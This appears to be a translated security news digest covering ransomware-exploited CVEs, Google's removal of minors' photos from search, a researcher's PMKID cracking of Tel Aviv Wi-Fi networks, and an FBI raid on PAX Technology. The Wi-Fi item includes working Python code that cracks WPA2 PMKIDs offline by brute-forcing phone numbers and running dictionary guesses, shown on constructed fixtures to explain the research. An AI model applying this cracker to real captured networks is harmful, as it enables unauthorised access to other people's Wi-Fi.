
Experts compile a list of the vulnerabilities in the ransomware arsenal



The project was initiated by information security expert Allan Liska, and a number of other security experts have joined him.

Security researchers are building a searchable list of the vulnerabilities that ransomware operators and their affiliates exploit to gain initial access to victim networks.

The list is presented as a diagram and gives defenders a starting point for prioritising patches against ransomware attacks.


It started with a call that Recorded Future security expert Allan Liska posted on Twitter last week. Liska announced his intention to compile a list of the vulnerabilities exploited by ransomware operators, and several specialists have since joined the effort.

Last week, several ransomware affiliates began exploiting the recently patched Windows MSHTML remote code execution vulnerability (CVE-2021-40444).

Earlier this month, Conti ransomware operators began attacking Microsoft Exchange servers to breach corporate networks through the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).

In August, the LockFile ransomware group began exploiting ProxyShell and PetitPotam (CVE-2021-36942) to take over Windows domains around the world, Magniber operators armed themselves with exploits for PrintNightmare (CVE-2021-34527), and eCh0raix began attacking QNAP and Synology devices (CVE-2021-28799).

In July, the HelloKitty ransomware operators attacked vulnerable SonicWall devices (CVE-2019-7481), and REvil breached Kaseya (CVE-2021-30116, CVE-2021-30119 and CVE-2021-30120). The FiveHands ransomware, in turn, weaponised the CVE-2021-20016 vulnerability in SonicWall products.

In April, AgeLocker began attacking QNAP NAS devices through an undisclosed vulnerability in outdated firmware. The Qlocker group also turned to QNAP devices and attacked them through CVE-2021-28799.

Around the same time, the Cring ransomware began encrypting unpatched Fortinet VPN devices (CVE-2018-13379) at industrial companies.

In March, Microsoft Exchange servers around the world were attacked by the Black Kingdom and DearCry ransomware through the ProxyLogon vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).

In December 2020 and January 2021, the Clop ransomware group attacked Accellion FTA servers (CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104), which drove up the average ransom payment over the following three months.



New feature from Google allows minors to remove their photos from search



The feature was first announced in August this year but has only now become widely available.

Google has launched a new safety feature that allows individuals under the age of eighteen to request that their photos be removed from search results. The company first announced its plans for the feature in August this year, but it has only now become widely available.

Anyone can start the removal process on the relevant Google support page. The requester must provide the URLs of the images to be removed from search results, the search terms for which the search engine returns those images, the name and age of the minor, and the name of the person acting on the minor's behalf together with their relationship to the minor (parent, guardian, and so on).

As with other removal requests, it is hard to say what criteria Google will apply when making a decision. According to the company, images of minors will be removed "except in cases of compelling public interest or newsworthiness". What this will mean in practice remains unclear.

Based on Google's wording, only requests concerning individuals who are currently under eighteen will be accepted. A person who is, say, thirty years old will therefore not be able to request the removal of photographs taken when they were fifteen.

Google also notes that removing photos from search results does not remove them from the internet. The company advises users requesting removal to contact the site's webmaster first. If that appeal leads nowhere, however, removing the images from Google search results will still be an important step.



Information security expert cracked Wi-Fi networks in Tel Aviv to test their password strength



The researcher cracked 73% of the 5,000 wireless networks he sampled.

CyberArk researcher Ido Hoorvitch conducted an experiment to find out how strong the Wi-Fi passwords in his home town of Tel Aviv really are.

Using equipment to capture Wi-Fi frames, Hoorvitch collected a sample of 5,000 hashes of wireless networks by means of the PMKID capture technique (which needs no connected client and no four-way handshake, only the access point's response to an association request). His kit was a $50 NIC with monitor-mode and packet-injection support and the WireShark tool.

The PMKID is an HMAC-SHA1 value (truncated to 128 bits) computed from the PMK, which is itself derived from the Wi-Fi password and the network name (SSID) with PBKDF2, together with the access point MAC address and the client MAC address. Because every input except the password is known to an attacker who captured the frame, the PMKID can be cracked offline by guessing passwords.

Hoorvitch first checked how many users had set their mobile phone number as the wireless password, a common practice in Israel. Cracking such a password only requires enumerating every possible Israeli mobile number. Using an ordinary laptop, the researcher cracked 2,200 passwords this way, at an average of 9 minutes per password.

Hoorvitch then fell back on a standard dictionary attack. Using the rockyou.txt wordlist, he cracked another 1,359 passwords (almost all of them consisting only of lowercase characters).

In total, Hoorvitch recovered the passwords of 3,663 of the 5,000 (73%) wireless networks he sampled in Tel Aviv. He published the technical details of the study in a CyberArk blog post.
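The three steps described above (PMKID derivation, the phone-number brute force and the dictionary attack) share one cracking loop, so here they are as a single added Python example. This is not Hoorvitch's or CyberArk's code: the SSID, MAC addresses, password and the capture line are constructed fixtures built inside the script, and the `PMKID*AP_MAC*STA_MAC*SSID_hex` line format is the legacy hashcat 16800 layout, used here only as a convenient plain-text representation of a captured PMKID.

```python
import hashlib
import hmac
from typing import Iterable, Iterator, Optional, Tuple

# Fixed by the WPA2-PSK standard: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes).
PBKDF2_ITERATIONS = 4096


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """The expensive step: 4096 rounds of HMAC-SHA1 per candidate password."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), PBKDF2_ITERATIONS, 32
    )


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC), per IEEE 802.11i."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_pmkid_line(line: str) -> Tuple[bytes, bytes, bytes, str]:
    """Parse a PMKID*AP_MAC*STA_MAC*SSID_hex line (legacy hashcat 16800 layout)."""
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    return (
        bytes.fromhex(pmkid_hex),
        bytes.fromhex(ap_hex),
        bytes.fromhex(sta_hex),
        bytes.fromhex(ssid_hex).decode("utf-8"),
    )


def crack_pmkid(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline guessing loop shared by the phone-number and dictionary attacks.

    Every input except the passphrase is in the captured line, so each candidate
    costs one PBKDF2 plus one HMAC and needs no contact with the network.
    """
    target, ap_mac, sta_mac, ssid = parse_pmkid_line(line)
    for pw in candidates:
        if not 8 <= len(pw) <= 63:  # WPA2 passphrases are 8..63 characters; skip impossible guesses
            continue
        if hmac.compare_digest(compute_pmkid(derive_pmk(pw, ssid), ap_mac, sta_mac), target):
            return pw
    return None


def israeli_mobile_numbers(prefix: str = "054", start: int = 0, count: int = 10_000_000) -> Iterator[str]:
    """Enumerate 10-digit Israeli mobile numbers: a 3-digit 05X prefix plus 7 digits.

    One prefix is a keyspace of 10^7 candidates; with a few prefixes in use this
    stays well inside what a laptop CPU can exhaust in minutes, which is why the
    phone-number attack outperforms a generic wordlist.
    """
    for n in range(start, start + count):
        yield f"{prefix}{n:07d}"


def make_capture_line(passphrase: str, ssid: str, ap_mac: str, sta_mac: str) -> str:
    """Constructed fixture: build the line a capture tool would have written for a known password."""
    ap = bytes.fromhex(ap_mac.replace(":", ""))
    sta = bytes.fromhex(sta_mac.replace(":", ""))
    pmkid = compute_pmkid(derive_pmk(passphrase, ssid), ap, sta)
    return "*".join([pmkid.hex(), ap.hex(), sta.hex(), ssid.encode("utf-8").hex()])


if __name__ == "__main__":
    # All values below are constructed for the demo, not taken from any real network.
    capture = make_capture_line("0541234567", "TLV_Home_5G", "00:11:22:33:44:55", "66:77:88:99:aa:bb")
    # Phone-number attack: a small window of the 054 keyspace that contains the password.
    print(crack_pmkid(capture, israeli_mobile_numbers("054", start=1234000, count=800)))
    # Dictionary attack with a tiny constructed wordlist: no hit, as expected.
    print(crack_pmkid(capture, ["password", "sunshine", "iloveyou"]))
```

On real captures the loop above is what hashcat runs on a GPU (mode 22000, or 16800 for the older line format); the Python version is only meant to make the cost model visible: PBKDF2 dominates, so the attacker's budget is entirely about keyspace size, and a password drawn from a 10^7-entry phone-number space is weak regardless of its length.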



The FBI raids the American office of PAX Technology



The searches are related to suspicions that PAX equipment may have been used in cyberattacks.

Agents of the US Federal Bureau of Investigation raided the Florida office of PAX Technology, a Chinese manufacturer of point-of-sale terminals. As journalist Brian Krebs reported, the searches are related to reports that PAX systems may have been used in cyberattacks against organisations in the United States and Europe.

PAX Technology is one of the world's largest manufacturers of payment terminals and a leading provider of merchant solutions and services. The company is headquartered in Shenzhen, China.

According to the American radio station WOKV, the FBI and the Department of Homeland Security raided a PAX Technology warehouse in Jacksonville. Investigators said the searches were carried out under a court order as part of a federal investigation led by the Department of Homeland Security with the participation of Customs and Border Protection and the Naval Criminal Investigative Service. The FBI did not comment on the situation.

According to Krebs, citing trusted sources, the FBI opened its investigation into PAX after a major US payment processor noticed unusual network packets originating from the company's payment terminals. The terminals were allegedly being used as a malware dropper and as command-and-control infrastructure for staging attacks and collecting information.

PAX Technology did not respond to Brian Krebs's request for comment.

According to the sources, two major financial providers in the US and the UK have already begun removing PAX terminals from their payment infrastructure.

"My sources say there is technical evidence for the use of the terminals in cyberattacks. The packet sizes do not match the billing information they are supposed to send and do not correlate with the telemetry these devices are supposed to produce in the event of a software update. PAX now claims the investigation is racially and politically motivated," the source said.

Krebs's source did not provide details of the unusual network activity that triggered the FBI investigation.
